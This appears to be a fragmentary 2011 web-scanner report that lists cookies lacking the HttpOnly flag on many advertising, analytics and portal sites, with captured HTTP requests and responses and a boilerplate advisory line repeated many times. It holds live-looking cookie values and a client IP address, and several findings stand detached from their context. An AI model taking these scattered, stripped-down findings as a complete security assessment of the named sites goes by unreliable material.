HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:24:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 0 Vary: Cookie Server: FriendFeedServer/0.1 Location: https://friendfeed.com/account/login?next=%2Fshare Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: AT=958258442349434896_1304375087; Domain=.friendfeed.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Set-Cookie: AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/ Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=40572&clicktag=[URLTRACKING]&rnd=[RANDOM] Content-Length: 340 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /add HTTP/1.1 Host: it.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:25:38 GMT Set-Cookie: B=b85h77h6rubr2&b=3&s=u7; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Location: http://it.add.yahoo.com/ Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Age: 0 Connection: close Server: YTS/1.20.0
<html><body>This page has moved, please <a href="http://it.add.yahoo.com/">click here</a> to go to its new location.</body></html><!-- w95.fp.re1.yahoo.com uncompressed/chunked Mon May 2 15:25:38 PDT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.cookie.js HTTP/1.1 Host: local.virgilio.it Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Alice Mail: e-mail gratis e posta elettronica sicura</title> <meta http-equi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/css/global.css HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/css/searchcio-midmarket_new.css HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:37 GMT Server: Apache/2.0.52 Last-Modified: Thu, 10 Mar 2011 00:11:58 GMT ETag: "1c0c03b-bbe-b199ef80" Accept-Ranges: bytes Content-Length: 3006 Content-Type: text/css Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/
.siteName:after { content: 'SearchCIO-MidMarket';} #headerLogo a { width: 485px; } #headline h1, #articleBody h1, #articleBody h2, .mmContent ul li h5, #tipSeriesToc h4 { color: #8e7770; } #headerNav ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/baynote-lib.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/googleAnalytics.min.js?date=20110429 HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/ieFixScripts.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:37 GMT Server: Apache/2.0.52 Last-Modified: Thu, 17 Feb 2011 19:55:00 GMT ETag: "157c3ab-1507-c5ca6d00" Accept-Ranges: bytes Content-Length: 5383 Content-Type: application/x-javascript Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/
$(document).ready(function ($) {
// for IE6, IE7 & IE8 if ($.browser.msie && $.browser.version < 9) {
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/jquery-1.4.2.min.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/jquery.writeCapture.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:35 GMT Server: Apache/2.0.52 Last-Modified: Wed, 23 Jun 2010 20:43:53 GMT ETag: "157c8a3-1026-9889d440" Accept-Ranges: bytes Content-Length: 4134 Content-Type: application/x-javascript Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/
/** * jquery.writeCapture.js * * Note that this file only provides the jQuery plugin functionality, you still * need writeCapture.js. The compressed version will contain both as as single
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/moScripts.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/tt_scripts.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/* * Global scripts file for TT * Dependency on jQuery */ // Functions and inline scripts // Global declarations ============================================================================ v ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/tt_thickbox-compressed.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/writeCapture.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /elsevier/elsevier-com/s?product.journaldescription.939.description&category=cws_home&ns__t=1304389821906 HTTP/1.1 Host: nl.sitestat.com Proxy-Connection: keep-alive Referer: http://www.elsevier.com/wps/find/journaldescription.cws_home/939/description User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 21:30:24 GMT Server: Apache Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="http://www.nedstat.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND NAV COM" Set-Cookie: s1=4DBF227072FC041D; expires=Sat, 30-Apr-2016 21:30:24 GMT; path=/elsevier/elsevier-com/ Location: http://nl.sitestat.com/elsevier/elsevier-com/s?product.journaldescription.939.description&ns_m2=yes&ns_setsiteck=4DBF227072FC041D&category=cws_home&ns__t=1304389821906 Content-Length: 367 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://nl.sitestat.com/elsevier/elsevier-com/s? ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /act.php HTTP/1.1 Host: nxtck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ccv2="eyI1NDM2IjpbMTMwNDM3NDQzMSxudWxsXX0="; tc=1; uuid=15ed6de5-a48a-4f38-af12-26a82a5ca9f8;
Response
HTTP/1.1 200 OK P3P: CP='ALL DSP LAW CUR DEV PSAo PSDo IVAo IVDo CONo HISo OUR STP UNI NAV' Server: NextPerformance/2.0 Set-Cookie: lsa=932c04dbae34d1720ca6fd5cd6179699; Expires=Tue, 01-May-2012 22:26:34 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 9 Date: Mon, 02 May 2011 22:26:34 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: omniture.virgilio.it Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:16:15 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26DF96978507A1D7-6000010040005559[CE]; Expires=Sat, 30 Apr 2016 22:16:15 GMT; Domain=.virgilio.it; Path=/ Location: http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&pccr=true&vidn=26DF96978507A1D7-6000010040005559&&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.4.1 Expires: Sun, 01 May 2011 22:16:15 GMT Last-Modified: Tue, 03 May 2011 22:16:15 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www2 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif?&dcsdat=1304392414589&dcssip=www.eni.com&dcsuri=/en_IT/home.html&WT.co_f=173.193.214.243-768797744.30148886&WT.vt_sid=173.193.214.243-768797744.30148886.1304392414591&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20Page%20Eni%20S.p.A.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.5.0&WT.dl=0&WT.ssl=0&WT.es=www.eni.com/en_IT/home.html&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 Host: sdc.eni.it Proxy-Connection: keep-alive Referer: http://www.eni.com/en_IT/home.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 303 Object Moved Connection: close Date: Mon, 02 May 2011 22:14:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif?dcsredirect=1&dcsdat=1304392414589&dcssip=www.eni.com&dcsuri=/en_IT/home.html&WT.co_f=173.193.214.243-768797744.30148886&WT.vt_sid=173.193.214.243-768797744.30148886.1304392414591&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20Page%20Eni%20S.p.A.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.5.0&WT.dl=0&WT.ssl=0&WT.es=www.eni.com/en_IT/home.html&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 Content-Length: 0 Set-Cookie: WEBTRENDS_ID=173.193.214.243-768797744.30148886; expires=Thu, 29-Apr-2021 22:14:27 GMT; path=/dcs67gfdv000000ggn52ira0x_5q6n P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Last-Modified: Wed, 07 Mar 2007 10:00:42 GMT Accept-Ranges: bytes ETag: "0813e779f60c71:b5c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My03Njg3OTc3NDQuMzAxNDg4ODYAAAAAAAABAAAACAAAAIQtv02ELb9NAQAAAAEAAACELb9NhC2/TQAAAAA-; path=/; expires=Thu, 29-Apr-2021 22:17:40 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Date: Mon, 02 May 2011 22:17:39 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bin/search HTTP/1.1 Host: search.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:26:52 GMT Set-Cookie: B=bpo29tt6rubtc&b=3&s=kb; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: sSN=3eSvUDo2wWFRGwNfu4Zai5tBVkIRVcnL10fjiylXzSdqNCm1Gni_b8k7hSc2rpURGtOsHmJqBbg7yUFu05.v1w--; path=/; domain=.search.yahoo.com Location: http://search.yahoo.com/web?fr= Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 86
<!-- syc13.search.ac2.yahoo.com uncompressed/chunked Mon May 2 15:26:52 PDT 2011 -->
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServervgn7-web=704759818.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://media.techtarget ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 303 Object Moved Connection: close Date: Mon, 02 May 2011 22:18:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcsjmy4y8000000w06qbhlh4j_1w6c/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1304392445956&dcssip=www.ansa.it&dcsuri=/&WT.co_f=173.193.214.243-1124471968.30145892&WT.vtid=173.193.214.243-1124471968.30145892&WT.vtvs=1304392445957&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=ANSA.it&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.ansa.it/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAALAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AAMMtv03DLb9NCwAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAADDLb9Nwy2/TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
guest_id=130437523139125964; path=/; expires=Wed, 01 Jun 2011 22:27:11 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
